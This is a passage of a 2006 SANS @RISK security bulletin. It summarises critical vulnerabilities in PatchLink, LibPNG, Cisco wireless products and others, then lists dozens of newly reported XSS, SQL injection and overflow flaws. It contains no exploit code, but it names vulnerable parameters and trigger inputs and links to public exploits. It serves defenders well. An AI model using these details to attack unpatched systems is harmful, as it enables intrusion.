Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 26
July 3, 2006

SANS Newsletters Home

A security product, Patchlink, allows remote exploitation. Apple iTunes has another security problem. And Apple OS/X users should install the new cumulative patch very soon.

Also researchers discovered another 55 cross-site scripting, SQL injection and other web application vulnerabilities this week. Give your web programmers a chance to know how to make their applications secure with a secure web programming course in Washington, Las Vegas or at your own site: http://www.sans.org/training/description.php?tid=394:

Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Windows
    • 1 (#14)
    • Other Microsoft Products
    • 1 (#8)
    • Third Party Windows Apps
    • 6 (#9, #12)
    • Mac OS
    • 1 (#6)
    • Linux
    • 3
    • Unix
    • 1 (#11)
    • Novell
    • 1
    • Cross Platform
    • 9 (#1, #2, #3, #4, #5, #7)
    • Web Application - Cross Site Scripting
    • 22
    • Web Application - SQL Injection
    • 9
    • Web Application
    • 24
    • Network Device
    • 1 (#10, #13)

****************** Summer Security Training Extravaganza ****************

Over the next two months, you may attend one or more of 50 SANS courses in 20 cities on four continents. And if you cannot make those events, because of travel restrictions, you may attend live SANS courses with the best teachers in the world, without leaving your home. You can even take SANS courses online at your own schedule. Attendance at SANS educational events is experiencing the largest growth spurt in half a decade. Pick your class and register early to get a seat. http://www.sans.org

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Other Microsoft Products
Third Party Windows Apps
Mac Os
Linux
Unix
Novell
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

**************** SANS Network Security 2006 - Las Vegas******************

SANS Network Security 2006, October 1-9, 2006 is at Caesar's Palace in Las Vegas. Thirty-seven immersion tracks and short courses plys a big security product exposition. Further information: http://www.sans.org/ns2006/

"Very intense. I have never been to a conference where we received so much information and so much more to learn post-conference." - -Paul Abels, UPS

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rob King and Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) CRITICAL: PatchLink Update Server Multiple Vulnerabilities
  • Affected:
    • PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
    • Novell ZENworks Patch Management 6.2 SR1

  • Description: PatchLink Update Server is a popular patch management solution for enterprises. It contains several vulnerabilities in its ASP scripts. (a) Failure to properly sanitize the "agentid" parameter to the "checkprofile.asp" script allows unauthenticated attackers to execute arbitrary SQL statements against the internal database with DBO privileges. (b) Failure to properly process user-supplied credentials in the "proxyreg.asp" script allows unauthenticated users to proxy requests to the PatchLink server. (c) Failure to properly process user-supplied credentials to the "nwupload.asp" script allows unauthenticated attackers to upload files to the server's filesystem and overwrite any files. These flaws can be exploited to compromise all the systems that are downloading their patches from the Patchlink server as the attacker can replace all the legitimate patches with malicious files. Proof-of-concept exploits for all these vulnerabilities have been publicly posted.

  • Status: PatchLink confirmed, updates available.

  • References:
  • (3) HIGH: LibPNG Chunk Processing Buffer Overflow
  • Affected:
    • LibPNG versions 1.2.11 and prior

  • Description: LibPNG, a popular library for processing PNG (Portable Network Graphics) images, is installed and used by default on all Linux, UNIX, BSD, and Mac OS X systems. Certain applications may also install the library on Windows systems. The library contains a buffer overflow that can be triggered by a specially crafted PNG image "chunk". Any application that delivers a malformed PNG image (web, email, IM) can exploit the overflow to execute arbitrary code with the privileges of the current user. Since LibPNG is open source, the technical details for this exploit can be obtained by examining the fixed code.

  • Status: LibPNG confirmed, updates available.

  • Council Site Actions: The responding council sites using the affected software plan to install any patches that come out for OS or applications they use within regular patching intervals. One also said they don't run graphical applications that take input from the outside world on their UNIX systems.

  • References:
  • (7) MODERATE: Computer Associates Multiple Products Format String Vulnerability
  • Affected:
    • Computer Associates eTrust Antivirus, PestPatrol and Integrated Threat
    • Management version 8.0

  • Description: Several Computer Associates antivirus products contain a format string vulnerability. The vulnerability can be triggered by a "Scan job" containing a format string such as %s in its description field. A remote attacker with the ability to create a scan job can exploit this flaw to execute arbitrary code on the system running the affected products. Note that clients running the AV software are at a risk only from local attackers. The servers running the AV scanning engine via an HTTP interface are only vulnerable if anonymous or authenticated users can submit scan job requests. The technical details for this vulnerability have been publicly posted.

  • Status: Computer Associates confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Computer Associates Vulnerability Information Center Article
Other Software
  • (9) HIGH: ArGoSoft Mail Server POP3 Remote Buffer Overflow
  • Affected:
    • ArGoSoft Mail Server Pro/Plus/FreeWare versions 1.8.x and prior

  • Description: ArGoSoft Mail Server contains an undisclosed remotely-exploitable buffer overflow. By sending specially-crafted traffic (believed to be related to the POP3 DELETE verb), an attacker could trigger this buffer overflow and execute arbitrary code with the privileges of the mail server process - often SYSTEM. Exploit code has been privately published via the Immunity Partners program, and is available to registered users of that program.

  • Status: Vendor has not confirmed, no updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Immunity Security Partner's Exploit
  • (10) HIGH: Cisco Wireless Control System Multiple Vulnerabilities
  • Affected:
    • Cisco Wireless Control System versions 3.2 and 4.0 and earlier

  • Description: Cisco Wireless Control System (WCS) is used to administer Cisco wireless devices from a centralized management point. The Cisco WCS suffers from multiple remotely-exploitable vulnerabilities. (a) Any user with access to the vulnerable system can gain access to the internal database due to a hard coded username and password. These credentials are easily determined. (b) A remote attacker can also read and write arbitrary files on the WCS server via the built-in TFTP server, if the server's root path contains a space character. (c) The login page of the WCS web interface does not properly sanitize user-supplied input, leaving it open to cross-site-scripting attacks. (d) WCS systems are shipped with a default administrator username and password, neither of which is changed by default during installation or initial login. By exploiting these vulnerabilities, any attacker with network access to the WCS system could potentially take complete control of the WCS system, or gain sensitive information about the wireless system (including encryption keys and passwords).

  • Status: Cisco confirmed, updates available.

  • Council Site Actions: Only two of the reporting council sites are using the affected software. One site has implemented the available workaround on their affected systems. The other site is still in the process of investing their exposure level.

  • References:
  • (11) MODERATE: Hashcash Remote Heap Buffer Overflow
  • Affected:
    • Hashcash reference implementation versions 1.20 and prior

  • Description: Hashcash is a system for combating unsolicited email ("spam"), by requiring senders to perform an easily-verified but difficult-to-calculate hash operation. This incurs a cost (in time) for senders, making it more difficult for them to send out mass emails. The reference Hashcash implementation, available on multiple platforms, suffers from a remotely-exploitable buffer overflow. By sending a specially-crafted Hashcash string to a vulnerable server, an attacker could exploit this overflow and execute arbitrary code with the privileges of the mail verification system - often root. Note that simply sending an email to a vulnerable server would be sufficient to trigger this overflow. Since this project is Open Source, technical details for this vulnerability are easily available.

  • Status: Hashcash confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Hashcash Change Log (includes vulnerability announcement)
  • (12) MODERATE: Dxmsoft XM Easy Personal FTP Server Buffer Overflow
  • Affected:
    • XM Easy Personal FTP Server version 5.0.1 and prior

  • Description: XM Easy Personal FTP Server is a commercial FTP server for Microsoft Windows designed for personal use (widely installed in China). The server contains a buffer overflow that can be triggered by submitting an input string greater than 8000 characters. An unauthenticated attacker can execute arbitrary code with the privileges of the FTP server process potentially SYSTEM. Proof-of-concept code for this vulnerability has been posted.

  • Status: Dxmsoft has not confirmed, no updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Proof-of-Concept by Jerome Athias
  • (13) MODERATE: Cisco Wireless Access Point Authentication Bypass
  • Affected:
    • Cisco Wireless Access Points/Bridge running IOS versions 12.3(8)JA or 12.3(8)JA1

  • Description: This vulnerability in the Cisco Wireless Access Point's web interface allows a remote attacker to completely control an affected Access Point. The flaw occurs when the Access Point's authentication method is changed from "Global Password" (default) to "Local User List Only". This configuration change results in revoking any authentication checks for accessing the device.

  • Status: Cisco confirmed, updates available.

  • References:
Exploit Code
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 26, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5057 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 06.26.1 - CVE: CVE-2006-328
  • Platform: Windows
  • Title: Internet Explorer OuterHTML Redirection Handling Information Disclosure
  • Description: Microsoft Internet Explorer is susceptible to an information disclosure vulnerability. This issue is due to a failure of the application to properly enforce cross-domain policies. Microsoft Internet Explorer version 6.0 on Windows XP SP2 is vulnerable to this issue.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047398.html
  • 06.26.2 - CVE: CVE-2006-3250
  • Platform: Other Microsoft Products
  • Title: Windows Live Messenger Contact List Processing Remote Heap Overflow
  • Description: Microsoft Windows Live Messenger is an instant messaging client. It is vulnerable to a remote heap overflow issue when the application processes a malicious contact list (.ctt) file. Windows Live Messenger version 8.0 is vulnerable.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047365.html
  • 06.26.3 - CVE: CVE-2006-3277
  • Platform: Third Party Windows Apps
  • Title: MailEnable SMTP HELO Command Remote Denial of Service
  • Description: MailEnable is a commercially available mail server. It is prone to an unspecified remote denial of service vulnerability. All current versions are affected.
  • Ref: http://www.mailenable.com/hotfix/default.asp
  • 06.26.4 - CVE: CVE-2006-2226
  • Platform: Third Party Windows Apps
  • Title: XM Easy Personal FTP Server Remote Denial of Service
  • Description: XM Easy Personal FTP Server is susceptible to a remote denial of service vulnerability. This issue presents itself when the affected application receives excessive data in an FTP PORT command. XM Easy Personal FTP Server version 5.0.1 is vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/18632
  • 06.26.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Lanap BotDetect CAPTCHA ASP.NET Bypass Weakness
  • Description: Lanap BotDetect allows developers to include CAPTCHA (completely automated public Turing test to tell computers and humans apart) mechanisms in web applications. The software stores a UUID and a hash value for CAPTCHAs in the ViewState of pages. By replaying the ViewState of known CAPTCHAs in future requests, attackers may bypass the mechanism. BotDetect CAPTCHA ASP.NET versions prior to 1.5.4.0 are affected.
  • Ref: http://www.securityfocus.com/bid/18315
  • 06.26.6 - CVE: CVE-2006-2310
  • Platform: Third Party Windows Apps
  • Title: BlueDragon Server .CFM Files Denial of Service
  • Description: BlueDragon is a ColdFusion Markup Language (CFML) server. It is prone to a remote denial of service issue due to the application's failure to efficiently handle malformed GET requests for ".cfm" and ".cfml" files. This issue affects version 6.2.1.286.
  • Ref: http://secunia.com/secunia_research/2006-18/advisory/
  • 06.26.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: ArGoSoft Mail Server POP3 Server Unspecified Remote Buffer Overflow
  • Description: The ArGoSoft Mail Server POP3 service is susceptible to a remote buffer overflow vulnerability. This issue allows remote attackers to execute arbitrary machine code in the context of the affected service. Visit the reference link for more details.
  • Ref: http://www.securityfocus.com/bid/18668
  • 06.26.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: XM Easy Personal FTP Server Buffer Overflow
  • Description: XM Easy Personal FTP Server is affected by a buffer overflow issue which presents itself when an attacker connects to the ftp server and issues an overly large sequence of "A%n" characters. All current versions are affected.
  • Ref: http://www.packetstormsecurity.org/0606-exploits/xmepftp.txt
  • 06.26.9 - CVE: Not Available
  • Platform: Mac Os
  • Title: Apple Mac OS X Multiple Security Vulnerabilities
  • Description: Mac OS X is prone to multiple security vulnerabilities. The issues include information disclosure, buffer overflow, format string and denial of service attacks. Apple has released Mac OS X version 10.4.7 to address these issues.
  • Ref: http://docs.info.apple.com/article.html?artnum=61798
  • 06.26.10 - CVE: CVE-2006-3242
  • Platform: Linux
  • Title: Mutt BROWSE_GET_NAMESPACE IMAP Namespace Processing Buffer Overflow
  • Description: Mutt is an email client. It is vulnerable to a remote buffer overflow issue when handling an excessive namespace value from a malicious IMAP server. Mutt versions 1.4.2.1 and earlier are vulnerable.
  • Ref: http://www.frsirt.com/english/advisories/2006/2522
  • 06.26.11 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel IBM S/390 strnlen_user Local Vulnerability
  • Description: The Linux kernel on IBM S/390 platforms is prone to a local vulnerability due to a flaw in the "strnlen_user()" kernel function. The direct impact of exploiting this issue is currently unknown. Linux kernel versions prior to 2.6.16 running on the IBM S/390 platform are affected.
  • Ref: http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16
  • 06.26.12 - CVE: Not Available
  • Platform: Linux
  • Title: libpng Graphics Library Chunk Error Processing Buffer Overflow
  • Description: libpng is the official Portable Network Graphics (PNG) reference library. It is vulnerable to a buffer overflow issue when handling malformed PNG files. libpng3 version 1.2.12 is not vulnerable.
  • Ref: http://www.securityfocus.com/bid/18698/info
  • 06.26.13 - CVE: Not Available
  • Platform: Unix
  • Title: EnergyMech CTCP Notice Denial of Service
  • Description: EnergyMech is an IRC bot. It is affected by a denial of service issue because the application does not properly handle empty CTCP NOTICEs correctly. EnergyMech versions prior to 3.0.2 are affected.
  • Ref: http://www.securityfocus.com/bid/18664
  • 06.26.14 - CVE: CVE-2006-3268
  • Platform: Novell
  • Title: Novell Groupwise Unauthorized Email Access
  • Description: Novell Groupwise is an enterprise collaboration suite. The API has an unspecified issue that allows a bypass of security controls. Novell Groupwise versions 7.0 and earlier are vulnerable.
  • Ref: http://secunia.com/advisories/20888/
  • 06.26.15 - CVE: Not Available
  • Platform: Cross Platform
  • Title: BitchX BX_Do_Hook Remote Denial of Service
  • Description: BitchX is an open source IRC client. It is vulnerable to a remote denial of service issue when handling excessive data from malicious IRC servers. BitchX version 1.1-final is vulnerable.
  • Ref: http://www.securityfocus.com/bid/18634
  • 06.26.16 - CVE: CVE-2006-3225
  • Platform: Cross Platform
  • Title: Sun ONE and Sun Java System Application Server Unspecified Cross-Site Scripting
  • Description: Sun ONE and Sun Java System applications are prone to an unspecified cross-site scripting vulnerability. This issue is due to a failure in the applications to properly sanitize user-supplied input. Visit the reference link for more details.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102479-1
  • 06.26.17 - CVE: CVE-2006-3252
  • Platform: Cross Platform
  • Title: Algorithmic Research PrivateWire Online Registration Remote Buffer Overflow
  • Description: PrivateWire is a security toolbox. It is exposed to a buffer overflow issue due to the failure of handling GET requests while registering user credentials. Privatewire gateway versions 3.7 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/438329
  • 06.26.18 - CVE: CAN-2006-0119
  • Platform: Cross Platform
  • Title: Lotus Domino SMTP Meeting Request Remote Denial of Service
  • Description: Lotus Domino is affected by a remote denial of service when the application receives malformed meeting requests via its SMTP service. These malicious vCal email messages are sent to the routing server "NROUTER.EXE" to be handled. When the routing server attempts to process the malicious request all available CPU resources are consumed indefinitely. Lotus Domino versions prior to 6.5.4 FP1, 6.5.5 and 7.0 are affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21211952
  • 06.26.19 - CVE: CVE-2006-2436
  • Platform: Cross Platform
  • Title: IBM WebSphere Application Server Multiple Remote Vulnerabilities
  • Description: IBM WebSphere Application Server is vulnerable to multiple remote issues due to insufficient sanitization of user-supplied input to various scripts. IBM WebSphere Application Server version 5.1.1 Cumulative Fix 11 resolves the issues.
  • Ref: http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24012429
  • 06.26.20 - CVE: CVE-2006-3118
  • Platform: Cross Platform
  • Title: SF Spread Insecure Socket File Creation Denial of Service
  • Description: Spread is a messaging daemon. The problem occurs when Spread creates the temporary file "/tmp/<port>". Before creating the socket file, Spread checks for the existence of the file, and if it exists it deletes it. This results in a race condition during the deletion and creation process.
  • Ref: http://www.securityfocus.com/bid/18675
  • 06.26.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: F-Secure Multiple Products Scan Evasion Vulnerabilities
  • Description: Multiple products by F-Secure are prone to scan evasion issues. Some products do not properly scan files with specially crafted names. Others stops scanning files on removable media when the "Scan network drives" option has been disabled.
  • Ref: http://www.f-secure.com/security/fsc-2006-4.shtml
  • 06.26.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cisco Wireless Control System Multiple Security Vulnerabilities
  • Description: Wireless Control System is a centralized, systems level application for managing and controlling lightweight access points and wireless LAN controllers for the Cisco Unified Wireless Network. It is prone to multiple security vulnerabilities like authorizaton bypass, arbitrary file access, cross-site scripting and information disclosure. Cisco Wireless Control System Software versions 4.0 and 3.2 are affected.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060628-wcs.shtml
  • 06.26.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: NeoEngine Format String And Denial of Service Vulnerabilities
  • Description: NeoEngine is affected by multiple format string and denial of service issues. A successful attack may crash the application or lead to arbitrary code execution. All current versions are affected.
  • Ref: http://aluigi.altervista.org/adv/neoenginex-adv.txt
  • 06.26.24 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: ADOdb Tmssql.PHP Cross-Site Scripting
  • Description: ADOdb is a database abstraction library for PHP. Insufficient sanitization of the "do" parameter in the "tmssql.php" script exposes the application to a cross-site scripting issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18638
  • 06.26.25 - CVE: CVE-2006-3305
  • Platform: Web Application - Cross Site Scripting
  • Title: UebiMiau Multiple Cross-Site Scripting Vulnerabilities
  • Description: UebiMiau is a webmail application. It is exposed to multiple cross-site scripting issues due to insufficient sanitization of HTML and script code from URI input. UebiMiau versions 2.7.10 and 2.7.2 are affected.
  • Ref: http://www.securityfocus.com/bid/18643
  • 06.26.26 - CVE: CVE-2006-3240
  • Platform: Web Application - Cross Site Scripting
  • Title: dotProject UI.Class.PHP Cross-Site Scripting
  • Description: dotProject is a web-based project management application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "login" parameter of the "ui.class.php" script. dotProject versions 2.0.3 and earlier are vulnerable.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=427236
  • 06.26.27 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GL-SH Deaf Forum Multiple Cross-Site Scripting Vulnerabilities
  • Description: GL-SH Deaf Forum is a web-based forum application. Insufficient sanitazation of the "sort", "page", "search" and "action" parameters of the "show.php" script exposes the application to multiple cross-site scripting issues.
  • Ref: http://www.securityfocus.com/bid/18651
  • 06.26.28 - CVE: CVE-2006-3265
  • Platform: Web Application - Cross Site Scripting
  • Title: Qdig Index.PHP Multiple Cross-Site Scripting Vulnerabilities
  • Description: Quick Digital Image Gallery (Qdig) is a web-based image gallery. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to the "pre_gallery" and "post_gallery" parameters of the "index.php" script. Quick Digital Image Gallery versions 1.2.9.2 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18653
  • 06.26.29 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Winged Gallery Thumb.PHP Cross-Site Scripting
  • Description: Winged Gallery is a web-based image gallery application. It is exposed to a cross-site scripting issue due to insufficient sanitization of user-supplied input in the "image" parameter of the "thumb.php" script. Winged Gallery version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18629
  • 06.26.30 - CVE: CVE-2006-3241
  • Platform: Web Application - Cross Site Scripting
  • Title: XennoBB Messages.PHP Cross-site Scripting
  • Description: XennoBB is a web-based bulletin board system. It is prone to a cross-site scripting vulnerability because it fails to sanitize HTML and script code in the "tid" parameter of the "messages.php" script. XennoBB version 1.0.5 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/18652
  • 06.26.31 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: MyMail Login.PHP Cross-Site Scripting
  • Description: MyMail is a mailing list script. Insufficient sanitization of the "error" parameter of the "login.php" script exposes the application to a cross-site scripting issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438331
  • 06.26.32 - CVE: CVE-2006-3301
  • Platform: Web Application - Cross Site Scripting
  • Title: phpQLAdmin Multiple Cross-Site Scripting Vulnerabilities
  • Description: phpQLAdmin is an administration tool for the QmailLDAP user database. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to various scripts. phpQLAdmin version 2.2.7 is vulnerable.
  • Ref: http://pridels.blogspot.com/2006/06/phpqladmin-vuln.html
  • 06.26.33 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Usenet Index.PHP Cross-Site Scripting
  • Description: Usenet is a web-based newsgroup application. Insufficient sanitization of the "group" parameter of the "index.php" script exposes the application to a cross-site scripting issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438443
  • 06.26.34 - CVE: CVE-2006-3245
  • Platform: Web Application - Cross Site Scripting
  • Title: MVN Forum Activatemember Cross-Site Scripting
  • Description: MVN Forum is a web-based bulletin board. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "member" and "activatecode" parameters. MVN Forum versions 1.0 GA and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2006/06/mvnforum-xss-vuln.html
  • 06.26.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: QaTraq Multiple Cross-Site Scripting Vulnerabilities
  • Description: QaTraq is a web-based task management application targeted at software testing. It is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize HTML and script code from URI input. QaTraq version 6.5 is affected.
  • Ref: http://www.securityfocus.com/bid/18620
  • 06.26.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: BlueDragon Server Error Page Cross-Site Scripting
  • Description: BlueDragon is a ColdFusion Markup Language (CFML) server. It is exposed to a cross-site scripting issue due to insufficient sanitization of user-supplied URI input. BlueDragon Server versions JX 6.2.1.286 and J2EE 6.2.1.286 are affected.
  • Ref: http://www.securityfocus.com/bid/18623
  • 06.26.37 - CVE: CVE-2006-3257
  • Platform: Web Application - Cross Site Scripting
  • Title: Claroline Multiple Unspecified Cross-Site Scripting Vulnerabilities
  • Description: Claroline is a collaborative-learning application. It is prone to multiple cross-site scripting vulnerabilities. Claroline versions 1.7.7 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/438343
  • 06.26.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: MF Piadas Admin.PHP Cross-Site Scripting
  • Description: MF Piadas is a web-based forum application. It is prone to a cross-site scripting vulnerability due to improper sanitization of user-supllied input to the "page" parameter of the "admin.php" script. MF Piadas version 1.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/438496
  • 06.26.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: H-Sphere Multiple Cross-Site Scripting Vulnerabilities
  • Description: H-Sphere is a multi-server web hosting solution. Insufficient sanitization of user-supplied input to the "next_template", "start", "curr_menu_id" and "arid" parameters exposes the application to multiple cross-site scripting issues. H-Sphere version 2.5.1 Beta 1 is affected.
  • Ref: http://pridels.blogspot.com/2006/06/h-sphere-25x-xss-vuln.html
  • 06.26.40 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: SiteBar Command.PHP Cross-Site Scripting
  • Description: SiteBar is an online bookmark manager. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "command" parameter of the "command.php" script. SiteBar versions 3.3.8 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18680/info
  • 06.26.41 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Phorum Read.PHP Cross-Site Scripting
  • Description: Phorum is a web-based forum application. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to an unspecified parameter of the "read.php" script. Phorum version 5.1.13 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/18683
  • 06.26.42 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Hostflow New_Ticket.CGI Cross-Site Scripting
  • Description: Hostflow is a help desk application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "desc" parameter of the "new_ticket.cgi" script. Hostflow versions 2.2.14 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2006/06/hostflow-vuln.html
  • 06.26.43 - CVE: CVE-2006-3174
  • Platform: Web Application - Cross Site Scripting
  • Title: SquirrelMail Search.PHP Cross-Site Scripting
  • Description: SquirrelMail is an online bookmark manager. The application is prone to a cross-site scripting vulnerability due to insufficient sanitization of the "mailbox" parameter of the "search.php" script. SquirrelMail versions 1.5.1 and earlier are vulnerable.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=375782
  • 06.26.44 - CVE: CVE-2006-2795
  • Platform: Web Application - Cross Site Scripting
  • Title: XiTi Tracking Script Xiti.JS Cross-Site Scripting
  • Description: XiTi tracking script monitors web traffic. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "xtref" parameter of the "xiti.js" script. XiTi versions 7 RC 0 and earlier are vulnerable.
  • Ref: http://www.osvdb.org/25844
  • 06.26.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Absolute Image Gallery XE Multiple Cross-Site Scripting Vulnerabilities
  • Description: Absolute Image Gallery XE is a web-based gallery application. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to various scripts. Absolute Image Gallery XE versions 2.0 and earlier are vulnerable. Ref: http://pridels.blogspot.com/2006/03/absolute-image-gallery-xe-20-xss-vuln.html
  • 06.26.46 - CVE: CVE-2006-3267
  • Platform: Web Application - SQL Injection
  • Title: Infinite Core Technologies ICT INDEX.PHP SQL Injection
  • Description: Infinite Core Technologies ICT is a web-based application. ICT is prone to an SQL injection issue due to insufficient sanitization of the "post" parameter of the "index.php" script. All current versions are affected. Ref: http://pridels.blogspot.com/2006/06/ict-infinite-core-technologies-vuln.html
  • 06.26.47 - CVE: CVE-2006-3304
  • Platform: Web Application - SQL Injection
  • Title: DeluxeBB CP.PHP SQL Injection
  • Description: DeluxeBB is a web-based bulletin board. Insufficient sanitization of the "xmsn" parameter in the "cp.php" script exposes the application to an SQL injection issue. All current versions are affected.
  • Ref: http://www.milw0rm.com/exploits/1953
  • 06.26.48 - CVE: CVE-2006-3244
  • Platform: Web Application - SQL Injection
  • Title: Anthill Multiple SQL Injection Vulnerabilities
  • Description: Anthill is a web-based bug tracking system. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "order" parameter of "buglist.php" and the "bug" parameter of "query.php". Anthill versions 0.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18661
  • 06.26.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: YaBB SE Profile.php SQL Injection
  • Description: YaBB SE is a web-based bulletin application. Insufficient sanitization of the "user" parameter of the "profile.php" script exposes the application to an SQL injection issue. All current versions are affected. Ref: http://archives.neohapsis.com/archives/fulldisclosure/2006-06/0606.html
  • 06.26.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Scout Portal Tool Kit
  • Description: Scout portal tool kit is a web-based bulletin board application. It is vulnerable to an SQL injection issue because it fails to sanitize user-supplied input to the "forumid" parameter of the "ForumTopics.php" script. Scout portal tool kit versions 1.4.0 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18688/info
  • 06.26.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: VCard PRO Multiple SQL Injection Vulnerabilities
  • Description: VCard PRO is a greeting card application. It is exposed to multiple SQL injection issues due to insufficient sanitization of user-supplied input. Belchior Foundry vCard PRO version 0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/438589
  • 06.26.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Blog:CMS Index.PHP SQL Injection
  • Description: Blog:CMS is a web-based publishing application. Insufficient sanitization of the "id" parameter of the "index.php" script exposes the application to multiple SQL injection issues. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438603
  • 06.26.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PatchLink Update Checkprofile.ASP SQL Injection
  • Description: PatchLink Update is a patch management application. PatchLink Update is prone to an SQL injection vulnerability. Novell ZENworks Patch Management is vulnerable as well because it is based on PatchLink technology. Versions 6.1 and 6.2 of the product are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438710
  • 06.26.54 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Xoops MyAds Module Annonces-p-f.PHP SQL Injection
  • Description: Xoops MyAds Module is a web-based publishing application. Insufficient sanitization of the "lid" parameter of the "annonces-p-f.php" script exposes the application to an SQL injection issue. All current versions are affected.
  • Ref: http://milw0rm.com/exploits/1961
  • 06.26.55 - CVE: Not Available
  • Platform: Web Application
  • Title: DreamAccount Auth.api.PHP Remote File Include
  • Description: DreamAccount is a membership management tool. Insufficient sanitization of the "path" parameter in the "auth.api.php" script exposes the application to a remote file include issue. All current versions are affected.
  • Ref: http://www.milw0rm.com/exploits/1954
  • 06.26.56 - CVE: CVE-2006-3269
  • Platform: Web Application
  • Title: THoRCMS Functions_cms.PHP Remote File Include
